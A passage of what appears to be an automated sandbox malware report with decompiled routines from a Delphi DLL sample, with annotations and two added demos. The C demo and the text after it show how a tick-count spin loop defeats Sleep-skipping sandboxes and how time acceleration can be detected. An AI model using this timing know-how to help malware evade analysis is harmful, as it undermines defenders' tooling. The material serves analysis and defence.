                          • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000), ref: 00705527
                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00705549
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                          • String ID: GetLongPathNameA$\$kernel32.dll
                          • API String ID: 3245196872-1565342463
                          • Opcode ID: 17ff3377fda2fe7b5fdf7a953d3e4a514314bfbce9b1c952aa217d5f9fe1a250
                          • Instruction ID: 42924251e429106383035c5f671c5bc661be6a7ba172ceab1fd71ec8f437d3ed
                          • Opcode Fuzzy Hash: 17ff3377fda2fe7b5fdf7a953d3e4a514314bfbce9b1c952aa217d5f9fe1a250
                          • Instruction Fuzzy Hash: 83419272E00559EFDB10EAA8CC89ADFB7EEEF48314F5402B1A549D7181D678DE448F50
                          Uniqueness

                          Uniqueness Score: -1.00%
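E007053C4 above is a long-path resolver: it tries kernel32!GetLongPathNameA through GetProcAddress and, when that export is missing or fails, rebuilds the path one component at a time with FindFirstFileA, copying each cFileName into a 0x105-byte (MAX_PATH + 1) stack buffer and giving up, with the caller's buffer left untouched, whenever a lookup fails or the result would not fit. The extra arguments printed on its API list (80000001, which is HKEY_CURRENT_USER, Software\Borland\Locales, and the access mask 000F0019) are the caller's stack residue and point at a locale-resource lookup of the kind the Delphi run-time library performs, not at anything specific to the payload. The Python below is an added re-implementation of the fallback path, not code from the sample or from the report, run against a constructed in-memory volume that stands in for FindFirstFileA; it shows the short-to-long name expansion, the UNC prefix skip, the unchanged return on a missing component, and the MAX_PATH bail-out. short_name, FakeVolume and the sample tree are assumptions made for the demo.

```python
MAX_PATH = 0x104    # 260; the decompiled bounds checks use 0x105 == MAX_PATH + 1
BUF = MAX_PATH + 1  # size of the stack buffer (_v595 - _v334 == 0x105 bytes)


def short_name(long):
    """Constructed 8.3-style alias for a long name, roughly like Windows auto-generated
    short names ('Program Files' -> 'PROGRA~1'). Good enough to exercise the resolver."""
    if len(long) <= 8 and " " not in long and "." not in long:
        return long.upper()
    stem = "".join(ch for ch in long.upper() if ch not in " .")
    return stem[:6] + "~1"


class FakeVolume:
    """Stand-in for FindFirstFileA over a constructed directory tree (assumption).

    tree maps a root ('C:' or '\\\\server\\share') to nested dicts of long names."""

    def __init__(self, tree):
        self.tree = tree

    def find(self, path):
        """Return the long cFileName of the last component of `path`, matched
        case-insensitively by long or 8.3 name, or None when the lookup fails."""
        upper = path.upper()
        for root, node in self.tree.items():
            if upper.startswith(root.upper() + "\\"):
                rest = path[len(root) + 1:]
                break
        else:
            return None
        name = None
        for part in rest.split("\\"):
            match = next((n for n in node if part.upper() in (n.upper(), short_name(n))), None)
            if match is None:
                return None
            name, node = match, node[match]
        return name


def resolve_long_path(path, volume, max_len=BUF):
    """Component-wise long-path resolution as the decompiled fallback does it.

    Keeps the 'X:' drive prefix (or skips '\\\\server\\share'), then looks every further
    component up on the volume and splices in its long name. Any failure, including a
    result that would not fit the 0x105-byte buffer, returns the input unchanged, which
    is what the caller's buffer keeps when the original function bails out. The final
    lstrcpyn truncates the result to max_len - 1 characters."""
    if path.startswith("\\\\"):
        server_end = path.find("\\", 2)
        share_end = path.find("\\", server_end + 1) if server_end >= 0 else -1
        if share_end < 0:
            return path                 # '\\server' or '\\server\share' alone: nothing to resolve
        pos = share_end
    elif path.startswith("\\"):
        return path                     # rooted path without a drive: not handled by the original
    else:
        pos = 2                         # 'X:' copied verbatim, never looked up
    out = path[:pos]
    while pos < len(path):
        nxt = path.find("\\", pos + 1)
        if nxt < 0:
            nxt = len(path)
        component = path[pos:nxt]       # '\name', the _t93.._t90 span in the decompilation
        if len(out) + len(component) + 1 > BUF:
            return path                 # _t45 + _t83 + 1 <= 0x105 failed
        found = volume.find(out + component)
        if found is None:
            return path                 # FindFirstFileA returned INVALID_HANDLE_VALUE
        if len(out) + len(found) + 2 > BUF:
            return path                 # no room for '\' + cFileName + NUL
        out = out + "\\" + found
        pos = nxt
    return out[:max_len - 1]


# Constructed sample volume and inputs (not taken from the analysed sample).
SAMPLE_TREE = {
    "C:": {
        "Program Files": {"Borland": {"Delphi7": {}}},
        "A" * 250: {"B" * 10: {}},
    },
    "\\\\srv\\share": {"Program Files": {}},
}
LONG_INPUT = "C:\\" + "A" * 250 + "\\" + "B" * 10   # long form would need 265 bytes


if __name__ == "__main__":
    vol = FakeVolume(SAMPLE_TREE)
    for p in ("C:\\PROGRA~1\\borland\\DELPHI7", "C:\\PROGRA~1\\Missing",
              "\\\\srv\\share\\PROGRA~1", LONG_INPUT):
        print(p[:40], "->", resolve_long_path(p, vol)[:40])
```

The silent "return the input unchanged" behaviour is the point worth remembering when this routine turns up in a call chain: a caller that later builds a file or registry path from the result may be working with the 8.3 form, or with a path that was never verified to exist.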

                          C-Code - Quality: 63%
                          			E00730108(int __eax, short __edx) {
                          				int _v8;
                          				short _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _t127;
                          				void* _t138;
                          				signed int _t142;
                          				void* _t145;
                          				void* _t152;
                          				void* _t156;
                          				void* _t162;
                          				void* _t165;
                          				void* _t174;
                          				signed int _t190;
                          				void* _t191;
                          				signed int _t192;
                          				signed int _t193;
                          				intOrPtr _t209;
                          				void* _t222;
                          				signed int _t223;
                          				void* _t232;
                          				void* _t237;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				// _v12 is the WM_xSCROLL message record: the word at +4 is the scroll code, the word at +6 the 16-bit position.
                          				// The stepped (smooth-scroll) path below is taken only when the flag at +0x1f is set and the code is a line or page code (< 4).
                          				if( *((char*)(_v8 + 0x1f)) == 0 ||  *((intOrPtr*)(_v12 + 4)) - 4 >= 0) {
                          					_t127 =  *((short*)(_v12 + 4));
                          					if(_t127 > 7) {
                          						goto L46;
                          					}
                          					// scroll codes 0..7: SB_LINEUP, SB_LINEDOWN, SB_PAGEUP, SB_PAGEDOWN, SB_THUMBPOSITION, SB_THUMBTRACK, SB_TOP, SB_BOTTOM
                          					switch( *((intOrPtr*)(_t127 * 4 +  &M007302D9))) {
                          						case 0:
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - ( *(_v8 + 8) & 0x0000ffff));
                          						case 1:
                          							__eax = _v8;
                          							__edx =  *((intOrPtr*)(_v8 + 0xc));
                          							_v8 =  *(_v8 + 8) & 0x0000ffff;
                          							__edx =  *((intOrPtr*)(_v8 + 0xc)) + ( *(_v8 + 8) & 0x0000ffff);
                          							__eax = _v8;
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + ( *(_v8 + 8) & 0x0000ffff));
                          						case 2:
                          							__eax = _v8;
                          							__eax = GetMenuBarInfo(??, ??, ??, ??); // no arguments recovered (??) and the result is used as the scroll page size: the resolved name is not reliable
                          							_v8 =  *((intOrPtr*)(_v8 + 0xc));
                          							__edx =  *((intOrPtr*)(_v8 + 0xc)) - __eax;
                          							__eax = _v8;
                          							return E00730478(_v8, __edx);
                          						case 3:
                          							__eax = _v8;
                          							__edx = GetMenuBarInfo(??, ??, ??, ??);
                          							__eax = _v8;
                          							__edx = __edx +  *((intOrPtr*)(_v8 + 0xc));
                          							__eax = _v8;
                          							return E00730478(_v8, __edx);
                          						case 4:
                          							__eax = _v8;
                          							if( *((intOrPtr*)(_v8 + 0x14)) <= 0x7fff) { // range fits in 16 bits: take the position word from the message, otherwise query it through E007300A8
                          								__edx = _v12;
                          								__edx =  *((short*)(_v12 + 6));
                          								__eax = _v8;
                          								return E00730478(_v8,  *((short*)(_v12 + 6)));
                          							}
                          							__edx = E007300A8(__ebp);
                          							__eax = _v8;
                          							return E00730478(_v8, __edx);
                          						case 5:
                          							__eax = _v8;
                          							if( *((char*)(_v8 + 0x1d)) == 0) {
                          								goto L46;
                          							}
                          							__eax = _v8;
                          							if( *((intOrPtr*)(_v8 + 0x14)) <= 0x7fff) {
                          								__edx = _v12;
                          								__edx =  *((short*)(_v12 + 6));
                          								__eax = _v8;
                          								return E00730478(_v8,  *((short*)(_v12 + 6)));
                          							}
                          							__edx = E007300A8(__ebp);
                          							__eax = _v8;
                          							return E00730478(_v8, __edx);
                          						case 6:
                          							__edx = 0;
                          							__eax = _v8;
                          							return E00730478(_v8, 0);
                          						case 7:
                          							__eax = _v8;
                          							__edx =  *((intOrPtr*)(_v8 + 0x14));
                          							__eax = _v8;
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0x14)));
                          					}
                          				} else {
                          					_t138 =  *((intOrPtr*)(_v12 + 4)) - 2;
                          					if(_t138 < 0) {
                          						_t190 =  *(_v8 + 8) & 0x0000ffff;
                          						_t192 =  *(_v8 + 0x40);
                          						asm("cdq");
                          						_v16 = _t190 / _t192;
                          						_t142 = _t190;
                          						asm("cdq");
                          						_t127 = _t142 / _t192;
                          						_v20 = _t142 % _t192;
                          						_t223 = _t192;
                          					} else {
                          						if(_t138 - 2 < 0) {
                          							_v16 =  *(_v8 + 0xa) & 0x0000ffff;
                          							_t193 =  *(_v8 + 0x3c);
                          							asm("cdq");
                          							_v20 = _v16 % _t193;
                          							asm("cdq");
                          							_t127 = _v16 / _t193;
                          							_v16 = _t127;
                          							_t223 = _t193;
                          						} else {
                          							_t223 = 0;
                          							_v16 = 0;
                          							_t127 = 0;
                          							_v20 = 0;
                          						}
                          					}
                          					_t222 = 0;
                          					if(_t223 <= 0) {
                          						L21:
                          						if(_v20 <= 0) {
                          							L46:
                          							return _t127;
                          						}
                          						_t145 =  *((intOrPtr*)(_v12 + 4)) - 1;
                          						_t237 = _t145;
                          						if(_t237 < 0) {
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v20);
                          						}
                          						if(_t237 == 0) {
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v20);
                          						}
                          						_t152 = _t145 - 1;
                          						if(_t152 == 0) {
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v20);
                          						}
                          						_t156 = _t152 - 1;
                          						if(_t156 == 0) {
                          							return E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v20);
                          						}
                          						return _t156;
                          					} else {
                          						do {
                          							_t191 = E00706C6C();
                          							_t162 = _t191 - _t222;
                          							_t209 =  *((intOrPtr*)(_v8 + 0x20));
                          							if(_t162 < _t209) {
                          								Sleep(_t209 - _t162); // waits only for the remainder of the per-step delay at +0x20 (elapsed time from E00706C6C): consistent with a paced scroll step rather than a timing probe
                          							}
                          							_t222 = _t191;
                          							_t165 =  *((intOrPtr*)(_v12 + 4)) - 1;
                          							_t232 = _t165;
                          							if(_t232 < 0) {
                          								E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v16);
                          							} else {
                          								if(_t232 == 0) {
                          									GetUserObjectInformationW(); // called with no recovered arguments; the resolved name is doubtful, as with GetMenuBarInfo above
                          								} else {
                          									_t174 = _t165 - 1;
                          									if(_t174 == 0) {
                          										E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) - _v16);
                          									} else {
                          										if(_t174 == 1) {
                          											E00730478(_v8,  *((intOrPtr*)(_v8 + 0xc)) + _v16);
                          										}
                          									}
                          								}
                          							}
                          							// virtual call through the object's vtable (slot at +0x88) after every step
                          							_t127 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x88))();
                          							_t223 = _t223 - 1;
                          						} while (_t223 > 0);
                          						goto L21;
                          					}
                          				}
                          			}

                          Instruction addresses for the C code above, in line order:
                          0x00730111 0x00730114 0x0073011e 0x007302c5 0x007302cc 0x00000000 0x00000000 0x007302d2 0x00000000 0x00000000
                          0x00000000 0x00730315 0x00730318 0x0073031e 0x00730322 0x00730324 0x00000000 0x00000000 0x00730335 0x00730338
                          0x00730340 0x00730343 0x00730345 0x00000000 0x00000000 0x00730356 0x0073035e 0x00730360 0x00730363 0x00730366
                          0x00000000 0x00000000 0x00730373 0x0073037d 0x00730392 0x00730395 0x00730399 0x00000000 0x0073039c 0x00730386
                          0x00730388 0x00000000 0x00000000 0x007303a3 0x007303aa 0x00000000 0x00000000 0x007303ac 0x007303b6 0x007303cb
                          0x007303ce 0x007303d2 0x00000000 0x007303d5 0x007303bf 0x007303c1 0x00000000 0x00000000 0x007303dc 0x007303de
                          0x00000000 0x00000000 0x007303e8 0x007303eb 0x007303ee 0x00000000 0x00000000 0x00730135 0x0073013c 0x00730140
                          0x0073014d 0x00730156 0x00730159 0x0073015c 0x0073015f 0x00730161 0x00730162 0x00730164 0x00730167 0x00730142
                          0x00730146 0x00730172 0x00730178 0x0073017e 0x00730181 0x00730187 0x00730188 0x0073018a 0x0073018d 0x00730148
                          0x00730191 0x00730195 0x00730198 0x0073019a 0x0073019a 0x00730146 0x0073019d 0x007301a1 0x00730242 0x00730246
                          0x007303fc 0x007303fc 0x007303fc 0x00730253 0x00730253 0x00730257 0x00000000 0x00730276 0x00730259 0x00000000
                          0x0073028c 0x0073025b 0x0073025e 0x00000000 0x007302a2 0x00730260 0x00730263 0x00000000 0x007302b8 0x00000000
                          0x007301a7 0x007301a7 0x007301ac 0x007301b0 0x007301b5 0x007301ba 0x007301bf 0x007301bf 0x007301c4 0x007301cd
                          0x007301cd 0x007301d1 0x007301ed 0x007301d3 0x007301d3 0x00730200 0x007301d5 0x007301d5 0x007301d8 0x00730213
                          0x007301da 0x007301dd 0x00730226 0x00730226 0x007301dd 0x007301d8 0x007301d3 0x00730233 0x00730239 0x0073023a
                          0x00000000 0x007301a7 0x007301a1

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: InformationObjectSleepUser
                          • String ID:
                          • API String ID: 335310428-0
                          • Opcode ID: 1aff24d065e6b569a32c44af94fefaf4a2e86952fa96b744b6e28a602b1df6c1
                          • Instruction ID: 3383b4f96ea5fed6d2b9f29a3c5b84338cbe593e8875f025936b44d728134f95
                          • Opcode Fuzzy Hash: 1aff24d065e6b569a32c44af94fefaf4a2e86952fa96b744b6e28a602b1df6c1
                          • Instruction Fuzzy Hash: 1891F634A44108DFEB44DBA8C6A99AEB7F1FF44310F248295E854A7317D738EE40AB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                           			E0072C54C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                           				char _v8;
                           				CHAR* _t20;
                           				long _t25;
                           				intOrPtr _t30;
                           				void* _t34;
                           				intOrPtr _t37;
                           
                           				_push(0);
                           				_t34 = __eax;
                           				_push(_t37);
                           				_push(0x72c5c9);
                           				_push( *[fs:eax]);
                           				 *[fs:eax] = _t37; // SEH frame, handler at 0x72c5c9
                           				L0072BFAC(__eax);
                           				_t25 = GetTickCount();
                           				do {
                           					Sleep(0); // yield only; how long the loop runs is decided by GetTickCount, not by Sleep
                           				} while (GetTickCount() - _t25 <= 0x3e8); // spin for 1000 ms; the unsigned subtraction survives the tick-count rollover
                           				L0072BBAC(_t34, _t25,  &_v8, 0, __edi, _t34);
                           				if(_v8 != 0) {
                           					_t20 = E00704528(_v8);
                           					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0); // 9 == HELP_FORCEFILE
                           				}
                           				_pop(_t30);
                           				 *[fs:eax] = _t30; // restore the previous SEH frame
                           				_push(0x72c5d0);
                           				return E00704068( &_v8);
                           			}

                          APIs
                            • Part of subcall function 0072BFAC: WinHelpA.USER32 ref: 0072BFBB
                          • GetTickCount.KERNEL32 ref: 0072C56A
                          • Sleep.KERNEL32(00000000,00000000,0072C5C9,?,?,00000000,00000000,?,0072C542), ref: 0072C573
                          • GetTickCount.KERNEL32 ref: 0072C578
                          • WinHelpA.USER32 ref: 0072C5AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CountHelpTick$Sleep
                          • String ID:
                          • API String ID: 2438605093-0
                          • Opcode ID: 2c4753cdf97dbb08393de8f2789201956cec870b4a96fae9073fcddd9900a883
                          • Instruction ID: 2fae21408a47383251a70b0507b2a87557245f176a4cb9ffe5d3b502124a852c
                          • Opcode Fuzzy Hash: 2c4753cdf97dbb08393de8f2789201956cec870b4a96fae9073fcddd9900a883
                          • Instruction Fuzzy Hash: DD01AD70700214EFE312FBA5DD6BB1EB7E8DB49B00F614261F500D25C5DB78AF208562
                          Uniqueness

                          Uniqueness Score: -1.00%
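                           The GetTickCount / Sleep / GetTickCount sequence at 0072C56A..0072C578 in the API list above is the part of E0072C54C worth understanding as a timing primitive: the function never asks Sleep to wait, it yields with Sleep(0) until GetTickCount reports that 1000 ms have passed. The C program below is an added worked example, not code from the sample or from this report. It re-implements that control flow with an injected clock and sleep so the loop can be driven offline by a simulated host; the names spin_wait_ms, plain_sleep_wait, struct sim, spin_iterations and plain_elapsed, and the 1 ms cost per yield, are constructed for the demonstration, not measured on any system. It contrasts three hosts: an honest one, one whose Sleep hook returns immediately, and one whose GetTickCount hook inflates every reading.

```c
#include <stdint.h>
#include <stdio.h>

/* Injected clock and sleep so the loop can be driven by a simulated host. */
typedef uint32_t (*tick_fn)(void *ctx);
typedef void (*sleep_fn)(void *ctx, uint32_t ms);

/* Same control flow as the loop in E0072C54C:
 *   t0 = GetTickCount(); do { Sleep(0); } while (GetTickCount() - t0 <= ms);
 * Returns how many times the body ran. The unsigned subtraction keeps the
 * comparison correct across the 49.7-day GetTickCount rollover. */
unsigned long spin_wait_ms(tick_fn tick, sleep_fn slp, void *ctx, uint32_t ms)
{
    uint32_t t0 = tick(ctx);
    unsigned long iters = 0;
    do {
        slp(ctx, 0);
        iters++;
    } while (tick(ctx) - t0 <= ms);
    return iters;
}

/* A plain Sleep(ms) wait, for contrast. Returns the tick delta it observed. */
uint32_t plain_sleep_wait(tick_fn tick, sleep_fn slp, void *ctx, uint32_t ms)
{
    uint32_t t0 = tick(ctx);
    slp(ctx, ms);
    return tick(ctx) - t0;
}

/* Simulated host (constructed; the numbers are illustrative, not measured):
 *  yield_cost_ms : wall time one Sleep(0) yield really costs (1 ms here)
 *  sleep_skip    : sandbox hook that returns from Sleep without waiting
 *  tick_boost_ms : sandbox hook that adds this much to every GetTickCount result */
struct sim {
    uint32_t now;
    uint32_t yield_cost_ms;
    int      sleep_skip;
    uint32_t tick_boost_ms;
    uint32_t tick_calls;
};

static uint32_t sim_tick(void *c)
{
    struct sim *s = c;
    s->tick_calls++;
    return s->now + s->tick_boost_ms * s->tick_calls;
}

static void sim_sleep(void *c, uint32_t ms)
{
    struct sim *s = c;
    if (!s->sleep_skip)
        s->now += ms;              /* the requested sleep, 0 for the spin loop */
    s->now += s->yield_cost_ms;    /* the context switch itself still burns real time */
}

/* Iterations the spin loop needs for a 1000 ms wait under the given hooks. */
unsigned long spin_iterations(int sleep_skip, uint32_t tick_boost_ms)
{
    struct sim s = { 0, 1, sleep_skip, tick_boost_ms, 0 };
    return spin_wait_ms(sim_tick, sim_sleep, &s, 1000);
}

/* Tick delta a plain Sleep(1000) observes under the given sleep hook. */
uint32_t plain_elapsed(int sleep_skip)
{
    struct sim s = { 0, 1, sleep_skip, 0, 0 };
    return plain_sleep_wait(sim_tick, sim_sleep, &s, 1000);
}

int main(void)
{
    printf("honest host         : spin %lu iters, Sleep(1000) sees %u ms\n",
           spin_iterations(0, 0), (unsigned)plain_elapsed(0));
    printf("Sleep hook skips    : spin %lu iters, Sleep(1000) sees %u ms\n",
           spin_iterations(1, 0), (unsigned)plain_elapsed(1));
    printf("GetTickCount +500/cl: spin %lu iters\n", spin_iterations(0, 500));
    return 0;
}
```

A sandbox that only shortens Sleep gains nothing against this loop: the iteration count is identical to the honest host, because the exit condition reads the tick counter, not the sleep duration, while the plain Sleep(1000) next to it collapses to a single yield. Advancing GetTickCount instead makes the loop exit after two iterations, which is the trade-off a time-acceleration hook has to manage: the inflated counter must stay consistent with every other time source the process can reach, or a 1000 ms wait that completed in two scheduler yields is itself the tell.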

                          C-Code - Quality: 91%
                           			E0074A9F4(void* __eax, intOrPtr* __edx) {
                           				char _v20;
                           				char _v28;
                           				intOrPtr _t17;
                           				void* _t19;
                           				void* _t21;
                           				void* _t32;
                           				void* _t39;
                           				void* _t45;
                           				intOrPtr _t47;
                           				intOrPtr _t48;
                           				void* _t50;
                           				void* _t51;
                           				intOrPtr* _t65;
                           				intOrPtr* _t67;
                           				void* _t68;
                           
                           				// window-message dispatcher: __eax is the owning object, __edx points at a
                           				// message record laid out as +0 Msg, +4 wParam, +8 lParam, +0xc Result
                           				_t67 = __edx;
                           				_t50 = __eax;
                           				_t17 =  *__edx;
                           				_t68 = _t17 - 0x84; // 0x84 == WM_NCHITTEST
                           				if(_t68 > 0) {
                           					_t19 = _t17 + 0xffffff00 - 9; // Msg - 0x109
                           					if(_t19 < 0) { // Msg in 0x85..0x108, which covers WM_KEYFIRST..WM_KEYLAST (0x100..0x108)
                           						_t21 = E00747054(__eax);
                           						if(_t21 != 0) {
                           							L28:
                           							return _t21;
                           						}
                           						L27:
                           						return L00747B64(_t50, _t67);
                           					}
                           					if(_t19 + 0xffffff09 - 0xb < 0) { // Msg in 0x109..0x20a, which covers WM_MOUSEFIRST..WM_MOUSELAST (0x200..0x20a)
                           						_t21 = E0074A960(__eax, _t51, __edx);
                           						if(_t21 == 0) {
                           							goto L27;
                           						}
                           						if( *((intOrPtr*)(_t67 + 0xc)) != 0) { // Result already set by the handler
                           							goto L28;
                           						}
                           						_t21 = E0074D240(_t50);
                           						if(_t21 == 0) {
                           							goto L28;
                           						}
                           						_push( *((intOrPtr*)(_t67 + 8))); // lParam
                           						_push( *((intOrPtr*)(_t67 + 4))); // wParam
                           						_push( *_t67); // Msg
                           						_t32 = E0074CFE0(_t50); // window handle of this object
                           						_push(_t32);
                           						L007067F0(); // DefWindowProcA; the same stub is resolved as NtdllDefWindowProc_A in the API list of E0072A41C
                           						return _t32;
                           					}
                           					goto L27;
                           				}
                           				if(_t68 == 0) { // WM_NCHITTEST
                           					_t21 = L00747B64(__eax, __edx);
                           					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) { // default Result other than HTTRANSPARENT (-1)
                           						goto L28;
                           					}
                           					E00706CD8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20); // lParam carries the hit-test point
                           					E00746470(_t50,  &_v28,  &_v20);
                           					_t21 = E0074A8CC(_t50, 0,  &_v28, 0);
                           					if(_t21 == 0) {
                           						goto L28;
                           					}
                           					 *((intOrPtr*)(_t67 + 0xc)) = 1; // Result = HTCLIENT
                           					return _t21;
                           				}
                           				_t39 = _t17 - 7; // 7 == WM_SETFOCUS
                           				if(_t39 == 0) {
                           					_t65 = L0072FBE8(__eax);
                           					if(_t65 == 0) {
                           						goto L27;
                           					}
                           					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))(); // virtual call through the vtable slot at +0xe8
                           					if(_t21 == 0) {
                           						goto L28;
                           					}
                           					goto L27;
                           				}
                           				_t21 = _t39 - 1;
                           				if(_t21 == 0) { // 8 == WM_KILLFOCUS
                           					if(( *(__eax + 0x54) & 0x00000020) != 0) { // object flag bit at +0x54 skips the default handling
                           						goto L28;
                           					}
                           				} else {
                           					if(_t21 == 0x17) { // Msg == 0x1f == WM_CANCELMODE
                           						_t45 = E0074CFE0(__eax);
                           						if(_t45 == GetCapture() &&  *0x76cce0 != 0) { // only when this window owns the mouse capture
                           							_t47 =  *0x76cce0; // 0x0
                           							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                           								_t48 =  *0x76cce0; // 0x0
                           								L00747A98(_t48, 0, 0x1f, 0); // forwards WM_CANCELMODE (0x1f) to the object held in the global
                           							}
                           						}
                           					}
                           				}
                           			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Capture
                          • String ID:
                          • API String ID: 1145282425-3916222277
                          • Opcode ID: 756d7bec61a7bd25f8bc185b9c332457c55a03bfa4687b842d079bd8c0c639ed
                          • Instruction ID: 48fcab0f47122bec3b4fa7533345bf1fea959de78bc6b8a7e044c61ccb9134e3
                          • Opcode Fuzzy Hash: 756d7bec61a7bd25f8bc185b9c332457c55a03bfa4687b842d079bd8c0c639ed
                          • Instruction Fuzzy Hash: 5C31A4F1384740ABDB209E3CC989B2A6396EB45314F15C939B85ACB692DB3CDC48D743
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                           			E00716C2C(void* __eax, struct HINSTANCE__* __edx) {
                           				intOrPtr _v8;
                           				void* __ebx;
                           				void* __ecx;
                           				void* __edi;
                           				void* __esi;
                           				void* __ebp;
                           				signed int _t10;
                           				struct HINSTANCE__* _t20;
                           				intOrPtr* _t22;
                           				intOrPtr _t30;
                           				void* _t32;
                           				intOrPtr* _t35;
                           				intOrPtr _t38;
                           				intOrPtr _t40;
                           
                           				_t38 = _t40;
                           				_push(_t22);
                           				_t35 = _t22;
                           				_t20 = __edx;
                           				_t32 = __eax;
                           				if(__edx == 0) {
                           					_t20 =  *0x76f668; // 0x700000, the image base of this dump: the module's own HINSTANCE is used when none is passed
                           				}
                           				_t10 = FindResourceA(_t20, E00704528(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000; // type 0xa == RT_RCDATA; the mask/compare is the decompiler's rendering of setne, so _t10 is nonzero iff the resource exists
                           				_t43 = _t10;
                           				if(_t10 == 0) {
                           					return _t10; // resource not present
                           				} else {
                           					_v8 = E00719738(_t20, 1, 0xa, _t32); // same module, name and RT_RCDATA type
                           					_push(_t38);
                           					_push(0x716ca0);
                           					_push( *[fs:eax]);
                           					 *[fs:eax] = _t40; // SEH frame
                           					 *_t35 = E00719238(_v8, _t20,  *_t35, _t32, _t35, _t43);
                           					_pop(_t30);
                           					 *[fs:eax] = _t30;
                           					_push(E00716CA7);
                           					return E00703274(_v8);
                           				}
                           			}

                          APIs
                          • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 00716C4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: FindResource
                          • String ID: Tq
                          • API String ID: 1635176832-501501286
                          • Opcode ID: 5c27a1bc27f8a32e70ad207f7df808fd31f99f9c0bbc6a3cccdd222b3f0e0658
                          • Instruction ID: 7f90d53a87fcddd7111b8e54ce1d768a2eebad5565d9078d3a93a8ce10358263
                          • Opcode Fuzzy Hash: 5c27a1bc27f8a32e70ad207f7df808fd31f99f9c0bbc6a3cccdd222b3f0e0658
                          • Instruction Fuzzy Hash: 2A01F271304300EFE714EF6EEC92DAAB3EDEB8A710B514439F504D72D0EA79AD0182A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                           			E007210CC(void* __ebx) {
                           				char _v260;
                           				char _v264;
                           				long _t21;
                           				void* _t22;
                           				intOrPtr _t27;
                           				void* _t32;
                           
                           				_v264 = 0;
                           				_push(_t32);
                           				_push(0x721168);
                           				_push( *[fs:eax]);
                           				 *[fs:eax] = _t32 + 0xfffffefc; // SEH frame
                           				_t21 = GetLastError();
